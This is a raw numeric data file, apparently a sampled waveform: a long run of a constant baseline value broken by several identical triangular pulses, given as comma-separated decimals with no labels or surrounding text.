-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 
0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0625, -0.0375, -0.00625, 0.01875, 0.04375, 0.075, 0.1, 0.13125, 0.15625, 0.18125, 0.2125, 0.2375, 0.2625, 0.29375, 0.31875, 0.35, 0.375, 0.4, 0.43125, 0.45625, 0.48125, 0.5125, 0.5375, 0.56875, 0.59375, 0.61875, 0.65, 0.675, 0.7, 0.73125, 0.75625, 0.7875, 0.75625, 0.73125, 0.7, 0.675, 0.65, 0.61875, 0.59375, 0.56875, 0.5375, 0.5125, 0.48125, 0.45625, 0.43125, 0.4, 0.375, 0.35, 0.31875, 0.29375, 0.2625, 0.2375, 0.2125, 0.18125, 0.15625, 0.13125, 0.1, 0.075, 0.04375, 0.01875, -0.00625, -0.0375, -0.0625, -0.0875, -0.1125, -0.1375, -0.16875, -0.19375, -0.16875, -0.1375, -0.1125, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
-0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, -0.0875, 
